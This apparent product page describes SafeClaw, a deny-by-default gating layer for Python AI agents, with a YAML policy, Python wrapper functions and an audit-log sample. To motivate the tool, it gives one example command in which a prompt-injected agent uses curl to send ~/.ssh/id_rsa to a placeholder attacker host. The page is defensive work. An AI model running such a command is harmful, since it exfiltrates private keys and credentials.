2025-12-22 · Authensor

AI Agent Safety for Python Developers

SafeClaw by Authensor gives Python developers deny-by-default action gating for AI agents. Every subprocess.run(), open(), requests.get(), and os.remove() call is intercepted and checked against your YAML policy before execution. Install it in seconds with npx @authensor/safeclaw and wrap your Python agent's dangerous operations with a single gate call.

Why Python Agents Need Gating

Python is the dominant language for AI agent development. Libraries like LangChain, CrewAI, and AutoGen all run in Python, and all of them can invoke shell commands, read files, install packages, and make HTTP requests. Without gating, a prompt injection can turn subprocess.run(["pip", "install", "legit-package"]) into subprocess.run(["curl", "attacker.com/exfil", "-d", "@~/.ssh/id_rsa"]).

SafeClaw's 446-test suite validates every gate decision. The hash-chained audit trail logs every action request, decision, and context — tamper-proof by design.

Installation

npx @authensor/safeclaw

SafeClaw runs as a sidecar process. Your Python agent communicates with it over a local HTTP interface or Unix socket.

Define Your Policy

Create a safeclaw.policy.yaml in your project root:

version: 1
defaultAction: deny


rules:
  - action: file.read
    path:
      glob: "/app/data/**"
    decision: allow



- action: file.write
    path:
      glob: "/app/output/**"
    decision: allow



- action: process.exec
    command:
      startsWith: "python"
    decision: allow



- action: process.exec
    command:
      startsWith: "pip install"
    decision: prompt  # require human approval



- action: network.request
    host:
      in: ["api.openai.com", "api.anthropic.com"]
    decision: allow



- action: network.request
    decision: deny  # block all other outbound

Integrate with Your Python Agent

Use SafeClaw's gate check before any dangerous operation:

import subprocess
import requests
from safeclaw import Gate


gate = Gate()  # connects to local SafeClaw instance



def safe_exec(command: list[str], cwd: str = ".") -> str:
    """Execute a shell command only if SafeClaw approves."""
    decision = gate.check({
        "action": "process.exec",
        "command": " ".join(command),
        "cwd": cwd
    })
    if decision.allowed:
        result = subprocess.run(command, capture_output=True, text=True, cwd=cwd)
        return result.stdout
    raise PermissionError(f"SafeClaw denied: {decision.reason}")



def safe_read(filepath: str) -> str:
    """Read a file only if SafeClaw approves."""
    decision = gate.check({
        "action": "file.read",
        "path": filepath
    })
    if decision.allowed:
        with open(filepath, "r") as f:
            return f.read()
    raise PermissionError(f"SafeClaw denied: {decision.reason}")



def safe_request(url: str, method: str = "GET", **kwargs) -> requests.Response:
    """Make an HTTP request only if SafeClaw approves."""
    from urllib.parse import urlparse
    host = urlparse(url).hostname
    decision = gate.check({
        "action": "network.request",
        "host": host,
        "url": url,
        "method": method
    })
    if decision.allowed:
        return requests.request(method, url, **kwargs)
    raise PermissionError(f"SafeClaw denied: {decision.reason}")

Gating pip install

Agents frequently try to install packages. Gate this explicitly:

def safe_pip_install(package: str) -> str:
    """Install a pip package only with human approval."""
    decision = gate.check({
        "action": "process.exec",
        "command": f"pip install {package}"
    })
    if decision.allowed:
        result = subprocess.run(
            ["pip", "install", package],
            capture_output=True, text=True
        )
        return result.stdout
    raise PermissionError(f"SafeClaw denied pip install {package}: {decision.reason}")

With the policy above, this triggers a prompt decision — SafeClaw pauses execution and asks a human to approve or deny the install.

Audit Trail

Every gate check is logged to SafeClaw's hash-chained audit trail:

{
  "timestamp": "2026-02-13T10:23:01Z",
  "action": "process.exec",
  "command": "pip install numpy",
  "decision": "prompt",
  "approved_by": "operator@company.com",
  "hash": "a3f8c1...",
  "prev_hash": "9b2d7e..."
}

This works with both Claude (via Claude Agent SDK, MCP) and OpenAI (Assistants API, function calling). SafeClaw is provider-agnostic and MIT licensed.

Cross-References

Try SafeClaw

Action-level gating for AI agents. Set it up in your browser in 60 seconds.

$ npx @authensor/safeclaw